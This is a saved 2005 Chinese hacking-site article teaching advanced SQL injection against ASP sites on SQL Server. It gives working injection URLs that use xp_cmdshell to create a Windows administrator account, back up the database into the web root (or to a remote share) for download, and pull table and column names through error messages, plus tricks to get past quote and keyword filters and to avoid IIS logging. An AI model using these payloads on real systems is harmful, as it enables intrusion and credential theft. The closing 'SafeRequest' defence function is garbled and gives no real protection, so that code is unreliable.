📄 asp漏洞全接触-高级篇.htm
字号:
</font></span></a><span class="style21"><span class="style56"><font color="#FFFFFF">
| </font></span></span><span class="style21"><a href="/hkjc/ldyj/" target="_blank"><span class="style55"><font color="#FFFFFF">
病毒漏洞</font></span></a></span><span class="style21"><span class="style54"><font color="#FFFFFF">
| </font></span></span><span class="style21"><a href="/wgjs/wbgf/" target="_blank"><span class="style54"><font color="#FFFFFF">
网吧攻防</font></span></a></span><span class="style21"><span class="style51"><font color="#FFFFFF">
| </font></span></span><span class="style21"><a href="/hkjc/aqff/" target="_blank"><span class="style50"><font color="#FFFFFF">
安全防范</font></span></a></span><span class="style21"><span class="style49"><font color="#FFFFFF">
| </font></span></span><span class="style21"><a href="/hkjc/rqsl/" target="_blank"><span class="style48"><font color="#FFFFFF">
入侵实例</font></span></a></span></div></td>
</tr>
</table></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="4%" height="22"> </td>
<td width="96%" valign="bottom"> </td>
</tr>
</table> </td>
</tr>
<tr valign="top">
<td height="110" colspan="2">
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="100%" align="center" background="/images/jun_n_10.gif"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="586" height="101">
<param name="movie" value="/images/ad_flash.swf">
<param name="quality" value="high">
<embed src="/images/ad_flash.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="586" height="101"></embed></object></td>
</tr>
</table>
</td>
</tr>
</table>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#F0F0F0">
<tr>
<td width="5" rowspan="2" valign="top" background="/images/jun_n_22.gif"><img src="/images/jun_n_14.gif" width="5" height="47" alt=""></td>
<td height="29" valign="top" background="/images/jun_n_15.gif"> </td>
</tr>
<tr>
<td height="100%" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor="#F6F6F6">你的位置:<!--empire.url--><a href=http://www.juntuan.net/>首页</a> > <a href='http://www.juntuan.net/hkbc'>黑客编程</a> > <a href='http://www.juntuan.net/hkbc/winbc'>WIN 编程</a> > 正文 ><!--empire.url--></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><!--empirenews.temp--><br>
<script language="JavaScript">
function doZoom(size){
document.getElementById('zoom').style.fontSize=size+'px';
}
</script>
<TABLE cellSpacing=1 cellPadding=3 width="96%" align=center border=0>
<TBODY>
<TR>
<TD class=f24> <CENTER>
<font color=#05006C>ASP漏洞全接触-高级篇</font> </CENTER></TD>
</TR>
<TR>
<TD align=middle><div align=center>
<HR SIZE=1>
文章作者:摘自: 文章来源:<a href='http://bbs.juntuan.net/index.asp' target=_blank>军团论坛</a>
发布时间:2005-05-15 08:28:52 </div></TD>
</TR>
<TR>
<TD><font id="zoom" class=f14><P><FONT size=2> 看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。 </FONT></P>
<P><FONT size=2> 第一节、利用系统表注入SQLServer数据库</FONT></P>
<P><FONT size=2> SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子: </FONT></P>
<P><FONT size=2> ①http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”-- </FONT></P>
<P><FONT size=2> 分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着: </FONT></P>
<P><FONT size=2> ②http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”-- </FONT></P>
<P><FONT size=2> 将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。 </FONT></P>
<P><FONT size=2> ③http://Site/url.asp?id=1 ;;and db_name()>0 </FONT></P>
<P><FONT size=2> 前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个系统变量,返回的是连接的数据库名。 </FONT></P>
<P><FONT size=2> ④http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;-- </FONT></P>
<P><FONT size=2> 这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如</FONT><A href="file://\\202.96.xx.xx\Share\1.db"><FONT size=2>\\202.96.xx.xx\Share\1.db</FONT></A><FONT size=2>),但成功率不高。 </FONT></P>
<P><FONT size=2> ⑤http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0 </FONT></P>
<P><FONT size=2> 前面说过,sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。 </FONT></P>
<P><FONT size=2> ⑥http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0 </FONT></P>
<P><FONT size=2> 从⑤拿到表名后,用object_id(‘表名’)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。 </FONT></P>
<P><FONT size=2> 以上6点是我研究SQLServer注入半年多以来的心血结晶,可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧。 </FONT></P>
<P><FONT size=2> 第二节、绕过程序限制继续注入 </FONT></P>
<P><FONT size=2> 在入门篇提到,有很多人喜欢用’号测试注入漏洞,所以也有很多人用过滤’号的方法来“防止”注入漏洞,这也许能挡住一些入门者的攻击,但对SQL注入比较熟悉的人,还是可以利用相关的函数,达到绕过程序限制的目的。 </FONT></P>
<P><FONT size=2> 在“SQL注入的一般步骤”一节中,我所用的语句,都是经过我优化,让其不包含有单引号的;在“利用系统表注入SQLServer数据库”中,有些语句包含有’号,我们举个例子来看看怎么改造这些语句: </FONT></P>
<P><FONT size=2> 简单的如where xtype=’U’,字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name=’用户’,可以用where name=nchar(29992)+nchar(25143)代替。 </FONT></P>
<P><FONT size=2> 第三节、经验小结 </FONT></P>
<P><FONT size=2> 1.有些人会过滤Select、Update、Delete这些关键字,但偏偏忘记区分大小写,所以大家可以用selecT这样尝试一下。 </FONT></P>
<P><FONT size=2> 2.在猜不到字段名时,不妨看看网站上的登录表单,一般为了方便起见,字段名都与表单的输入框取相同的名字。 </FONT></P>
<P><FONT size=2> 3.特别注意:地址栏的+号传入程序后解释为空格,%2B解释为+号,%25解释为%号,具体可以参考URLEncode的相关介绍。 </FONT></P>
<P><FONT size=2> 4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。 </FONT></P>
<P><FONT size=2> 5.猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高。 </FONT></P>
<P><FONT size=2> SQL注入漏洞可谓是“千里之堤,溃于蚁穴”,这种漏洞在网上极为普遍,通常是由于程序员对注入不了解,或者程序过滤不严格,或者某个参数忘记检查导致。在这里,我给大家一个函数,代替ASP中的Request函数,可以对一切的SQL注入Say NO,函数如下: </FONT></P>
<P><FONT size=2> Function SafeRequest(ParaName,ParaType) <BR> --- 传入参数 --- <BR> ParaName:参数名称-字符型 <BR> ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符) </FONT></P>
<P><FONT size=2> Dim ParaValue <BR> ParaValue=Request(ParaName) <BR> If ParaType=1 then <BR> If not isNumeric(ParaValue) then <BR> Response.write "参数" & ParaName & "必须为数字型!" <BR> Response.end <BR> End if <BR> Else <BR> ParaValue=replace(ParaValue,"","") <BR> End if <BR> SafeRequest=ParaValue <BR> End function <BR> <BR></FONT></P></font></TD>
</TR>
<TR>
<TD> </TD>
</TR>
<TR>
<TD> </TD>
</TR>
<TR>
<TD height="25"> <div align="right">
<table width="99%" border="0" align="center" cellpadding="3" cellspacing="1">
<tr>
<td><div align="right">【<a href="javascript:doZoom(16)">大</a>
<a href="javascript:doZoom(14)">中</a> <a href="javascript:doZoom(12)">小</a>】【<a href="http://www.juntuan.net/e/DoPrint?newsid=5063" target="_blank">打印</a>】【<a href="javascript:window.close()">关闭</a>】</div></td>
</tr>
</table>
</div></TD>
</TR>
<TR>
<TD height="25"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="50%" valign="top">
<table width="99%" border="0" align="center" cellpadding="3" cellspacing="1">
<tr>
<td height="28" background="/images/ad_dhtp.gif"> <div align="center">最新热点</div></td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><div align="left"><script src=http://www.juntuan.net/d/js/js/newnews.js></script></div></td>
</tr>
</table>
</td>
<td width="50%" valign="top">
<table width="99%" border="0" align="center" cellpadding="3" cellspacing="1">
<tr>
<td height="28" background="/images/ad_dhtp.gif"> <div align="center">最新推荐</div></td>
</tr>
<tr>
<td bgcolor="#FFFFFF"> <div align="left"><script src=http://www.juntuan.net/d/js/js/goodnews.js></script>
</div></td>
</tr>
</table>
</td>
</tr>
</table></TD>
</TR>
</TBODY>
</TABLE><!--empirenews.temp--></td>
</tr>
</table>
</td>
</tr>
</table></td>
</tr>
<tr>
<td valign="top"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td bgcolor="#FFFFFF"><img name="aa" src="" width="1" height="1" alt=""></td>
</tr>
</table></td>
<td colspan="2" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td bgcolor="#CBCAC7"><img name="aa" src="" width="1" height="1" alt=""></td>
</tr>
</table></td>
</tr>
<tr align="center">
<td colspan="3" valign="top"><table width="328" height="68" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="48" height="32"><div align="center" class="style21">
<div align="center"><a href="/bottom/juntuanintro.htm">关于我们</a></div>
</div></td>
<td width="7"><div align="center" class="style21">|</div></td>
<td width="50"> <div align="center" class="style21">
<div align="right"><a href="/bottom/copyright.html">本站声明</a></div>
</div></td>
<td width="6"><div align="center" class="style21">|</div></td>
<td width="50"><div align="center" class="style21">
<div align="right"><a href="/indextop/anquanfagui.html">法律法规</a></div>
</div></td>
<td width="6"><div align="center" class="style21">|</div></td>
<td width="51"><div align="center" class="style21">
<div align="right"><a href="/bottom/wangzhanlayer.htm">网站律师</a></div>
</div></td>
<td width="6"><div align="center" class="style21">|</div></td>
<td width="49"> <div align="center" class="style21">
<div align="right"><a href="/bottom/cu.htm">联系我们</a> </div>
</div></td>
<td width="6"><div align="center" class="style21">|</div></td>
<td width="49"> <div align="center" class="style21">
<div align="right"><a href="/bottom/zhaopin.htm">军团招聘</a> </div>
</div></td>
</tr>
<tr>
<td height="18" colspan="11"><div align="center">
<script language="JavaScript" type="text/javascript" src="http://w.50bang.com/click.js?user_id=115646"></script>
</div></td>
</tr>
<tr align="center">
<td height="18" colspan="11">copyright©1999-2005 第八军团 All rights
reserved </td>
</tr>
</table></td>
</tr>
</table>
</body>
</html><script src='http://www.juntuan.net/e/onclick?enews=donews&newsid=5063'></script>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -